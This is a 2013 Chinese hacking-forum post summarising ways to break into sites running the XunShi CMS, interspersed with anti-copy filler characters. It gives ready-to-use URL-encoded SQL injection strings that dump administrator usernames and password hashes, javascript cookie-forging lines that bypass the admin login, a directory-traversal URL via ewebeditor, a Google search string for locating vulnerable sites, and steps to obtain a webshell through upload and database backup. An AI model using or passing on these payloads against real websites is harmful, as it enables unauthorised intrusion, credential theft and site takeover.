找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2345|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
: f0 [) Q( P' U+ O' {+ E2 Z& G& T  V) v# k' z: Q" k
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)* u2 c$ F- C, Z9 F7 s
. u0 K) x. B5 v3 s" o; ~/ X
以下本文总结来自黑防去年第9期杂志上的内容...# h/ U* \5 V4 S# B' q; \

& \! A% t; r8 @9 M2 \8 A先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%% p* u1 z( [0 |7 f# J
7 Q# h; a' T) k  E; V
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 : G$ b5 D% I3 x" |; O
* E: z0 z# C9 r: ?  d% G
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
0 Y/ w3 ]1 s# y5 ]0 e* x+ L这里一个注入
& A* d. ]$ o. p; h6 f# W. J
2 x- f# o3 @$ ?1 ^8 _效果如图:3 q4 v2 Q: D$ m2 h* m, }

* h4 q4 R# f* j' Z/ o7 `
4 A2 I' r# x) I. D6 Y( \
* @, [2 P3 W2 a7 b2 ~7 W这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
: }) K$ ~/ g" n, _" w/ v; R+ n9 Y) E0 W2 M9 E% h; [7 E& M
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去$ y. g' m. d- L" T

; L! e/ p& E. J. y" ajavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
& q% \# p$ O) W& J3 S
/ g. K- `0 x- T$ N: S那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:0 h% A  P3 D, F  Y5 |& z1 b/ S

- k) P: r. ^! Q( J" P: U* D/ G8 m因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞. N+ A2 o5 v3 Y
- Q* A; u) \" {% e/ E. v
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以, N: u; V! r$ v' b2 n
; u% s6 k2 L$ t' |
访问这页面来列目录..步骤如下:8 C3 z, m7 A, V. ~
# s3 T/ m( c4 {$ }
javascript:alert(document.cookie="admindj=1") 9 a& Q1 Z2 z0 `& H% @

# I  k) c2 x! v4 w# j9 l# Bhttp://www.political-security.co ... asp?id=46&dir=../..
7 Y, ?* n+ b8 N
# f2 D" S5 r9 O& m: t效果如图:
* S$ n4 a% D% u" ^* y! g
3 `7 F7 C: X# g( s0 D* h * e6 H4 H, Q9 l0 s/ W- k% ]

% t* O: A7 r6 i/ e# L- m这样全站目录都能瞧了..找到后台目录..进去..
/ r7 @% G& v7 L( }
5 P+ P; J! ?$ V! s& Q  D4 v那么进了后台怎么拿shell??上传--备份就ok了..2 D  K; |. H- H6 n' W' z
) @, f5 i9 u1 {6 F) y
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
# `6 ^7 r. s% j' M5 {9 i" j2 l
9 r3 c! R) B9 a6 G# [9 ^: s这个我也碰到过一次..你都可以通过列目录来实现..
% l- n( j) A% z# C6 o2 \2 d7 J/ s7 U6 q
javascript:alert(document.cookie="admindj=1")
* W) V0 T! C4 H, v  L. d. S
* j! b. Y) \0 r" _http://www.political-security.co ... p?action=BackupData " u1 w7 a$ y" L  G
- L* N' ~' ^0 J3 f) U/ ^, p* A
备份ok..9 L( ^" B' ^  h

: x, K7 \4 x$ o% F' i那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
+ p4 r. {9 J) h9 l: {& D9 k  x
' m+ e% R& P8 o4 t2 `在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下  L5 M/ Z. z7 @. ?% k* m4 Y( {
! o" C( g2 n9 c" O0 V+ G) n9 V
然后访问此页面进行注入..步骤如下:9 I/ u% ^, d1 k, q" n3 x
' w1 ?# n; W$ r6 h  f
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
3 q. W& b2 l) r) R. [8 C  U6 o& e: B4 x$ G( |8 S& l$ Y3 Z. N
然后请求admin/admin_chk.asp页面
8 R& S8 A6 p( U0 v1 F& j$ W) u/ M
2 y) \  C3 h; L( ?输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
" j4 W4 O, o5 ]6 V3 R
" l% r: `* X& Q6 {% I% Y/ d- E1 J2 u26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
! E# G" n% Q( k' d( k
5 U, a- j2 y, j# Y( Q9 m效果如图所示:3 d6 Z6 b6 i. Y8 Z3 j. p

* G/ G" o; c+ l( x+ B
( M6 U( O) u7 {+ n9 n
) F+ c& ?* g% j3 T4 p( p$ J讯时漏洞26 }3 S) p+ I, {" O7 z
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)2 o$ E) _, D5 k1 [3 t
: w8 u0 @) S: g$ O8 h6 u: h
1、/admin/admin_news_pl_view.asp?id=1
/ {% M, Q0 Z! S//id任意 填入以下语句/ @6 M/ Y( p; Z) ^
( l3 k  g- I' U
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
3 n# |' P6 F# p
- L5 [# S+ g; U  H
% V3 o. }& H' P' t. ^& d$ V2 G, L8 v) |% i
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
9 k% x3 s6 g$ S% q6 D/ r$ c2 m" H' N
# o- f* B9 m  l0 Q
+ S0 ~; k  e. m% }; C1 I$ l4 ^% d0 I- l
爆出管理员帐号和密码了$ h, k& R, s+ S3 s/ I
- u4 _. k4 M: e% x
8 o+ q. w# P# }2 d6 D

$ |# }3 S2 S* i, ^. O4、cookies进后台- U$ T$ n0 q* V1 u! w; z

' z% w- }5 ^) f) T1 ajavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
$ \( m* \% r3 Z8 c4 m+ P ! R0 A" [+ M" E
/ R1 j4 D: u" u2 u1 B) d

5 ^; L8 o1 Y" N! ]0 ?$ b5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
4 H4 N* U& ^* b- o
8 H$ O' S0 G1 w! k" E9 j% N! a3 T2 ^0 @  d& j& l
' z$ Y1 ^* H. \7 {# ?  J
6、后台有上传和备份取SHELL不难。
: @4 g8 y( ~' [1 n/ a
3 @& o/ Z- X: J# T( f% W! b* M. C7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..2 h8 G0 @; X0 f8 b& W7 s: f! z

  M+ v* S8 n! u0 q逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!9 S( T) d! |8 p0 Z* U$ A

' e. e. _2 u& `
+ H+ w* \# [9 G. [" ]1 B
# k7 P/ l1 r6 M9 f  y: w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表